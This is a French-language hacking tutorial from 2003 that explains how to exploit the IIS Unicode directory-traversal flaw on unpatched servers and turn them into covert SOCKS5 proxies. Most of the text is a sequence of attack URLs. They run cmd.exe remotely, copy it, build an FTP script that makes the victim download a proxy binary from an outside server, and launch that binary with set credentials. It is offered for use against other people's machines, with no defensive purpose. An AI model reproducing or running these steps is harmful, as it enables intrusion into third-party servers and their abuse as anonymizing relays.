Date
: 07/05/2003
Auteur : A-bone
Sujet
: Installation d'un proxy sur un serveur IIS distant .
Produit : IIS server
.
Dans ce tutorial
je vais presenter une technique assez peut connus , d'installation de proxy
sur
un serveur IIS non patché ( failles unicodes ).
Information
:
Le bug unicode a été decouvert par la société
eeyes ( www.eeyes.com ), une instruction envoyée au serveur distant permet
l'affichage d'un repertoire virtuel sur le serveur .
Apres l'execution de ce
code voir le disque dur voullu , tel le c:\, d:\ etc .... ( comme j'ai expliquer
dans le TDC Mag N°1 )
Application de la faille :
Pour trouver des serveurs Hackable par unicode rien de tel qu'un petit scaneur, telechargable partout sur internet .
Ma presentation ce porte sur une failles precise : /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
Après avoir trouvé un serveur potentiel nous allons lancé la procedure instalation de notre serveur.
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
Avec
ce type d'attaque nous arrivons directement au disque dur c:\
Le but pour nous est de creer un repertoire d'acceuil et de copier le fichier cmd.exe
-
Creation du repertoire :
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+mkdir+c:\test
Une
erreur type cgi doit vous apparaitre,
-
maintenant on copie le fichier cmd.exe vers le repertoire test .
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\test\cmd2.exe
la
commande ci-dessous va nous permette de verifier si le fichier est bien copier
cmd.exe est bien copier dans le repertoire test .
http://IPSERVEUR/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\test\
une
fois la verification éffectué nous allons créer un fichier
texte, celui-ci nous permettra de faire telecharger
au serveur distant le fichier
qui nous est necessaire.
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+open+Serveur
anonym+21>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+Login+>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+password+>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+get+boundll.exe+>>+c:\test\1.txt
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+echo+quit+>>+c:\test\1.txt
Une
fois c'est commande d'ajout de ligne dans le fichier 1.txt terminer, une petite
verification s'impose.
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+type+c:\test\1.txt
vous
devriez voir avoir ceci :
open Serveur anonym 21
user Login
password
boundll.exe
quit
Maintenant
que notre fichier text est bon nous allons lancer le telechargement du fichier.
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+ftp+-i+-n+-v+-s:c:\test\1.txt
Ici
si la barre de progression de chargement prend de temps a chargé c'est
bon !!
Sinon ou vous avez fait une erreur ou le serveur distant est proteger
par firewall.
La commande suivante permet de verifier l'upload de notre fichier
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+dir+c:
Les
commandes ci-dessous permettent de créer les paramettres de notre proxy,
socks etc...
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+dir+c:\test\boundll.exe+--port+6668+--socks5+--daemon+--s_user+A-bone+--s_password+A-bone
Ou
:
http://IPSERVEUR/scripts/..%255c../test/cmd2.exe?/c+c:\inetpub\scripts\boundll.exe+--port+6668+--socks5+--daemon+--s_user+A-bone+--s_password+A-bone
Voila dans mon exmple il nous restera plus qu'a ce connecter l'ip du serveur, port 6668 avec le login et mot de pass : A-bone
Pour
infos voici quelques commandes permettant le paramettrage du proxy
Exemples :
§§ Configuration 1 : "boundll.exe --port 6668 --socks5 --daemon --s_user TEST --s_password TEST"
Ceci lancera le proxy sur le port 6668 et pour l'utiliser il faudra utiliser les login/pass: TEST/TEST
§§ Configuration 2 : "boundll.exe --port 6668 --socks5 --daemon --s_user TEST --s_password Proxy --a_port 6669 --a_user admin --a_password N41r0lF
Ceci
lancera le proxy avec la même configuration que la Configuration 1 mais
en plus, vous pourrez gérer à distance le proxy en vous tapant:
http://ip.du.proxy:6669
l'administration
à distance ne se résumé qu'à deux choses:
- connaitre
les ip des personnes connectées sur le proxy,leur vitesse, et à
quelle ip elles sont connectées
- stopper le proxy
le ficher : boundll.exe
Malgré que les méthodes d'exploit de la failles UNICODE son multiple notre groupe DHS essaye de toujours dévoiler des nouveauté de vous faire connaître quelque chose de réel quelque chose de vrais quelque chose tester , j'espère que c'est constructif et a la prochaines :)